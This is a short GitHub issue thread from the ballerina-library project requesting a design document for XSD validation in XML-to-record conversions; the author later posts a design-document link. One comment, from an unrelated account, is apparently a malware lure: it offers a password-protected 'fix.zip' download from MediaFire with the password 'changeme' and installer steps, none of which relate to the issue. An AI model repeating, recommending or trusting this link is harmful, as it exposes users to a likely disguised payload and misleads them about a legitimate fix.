### ISSUE TITLE
Add design document for support validation through XSD in XML to record conversions

### ISSUE THREAD

**Issue by SasinduDilshara** [ballerina-platform/ballerina-library#6936]
Add design document for support validation through XSD in XML to record conversions

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SasinduDilshara** [comment]
Design document - https://docs.google.com/document/d/1nz-Osw3kyLpSzkBfZkGIcM0BPzth_ScEVeatAYrXFMw/edit?usp=sharing
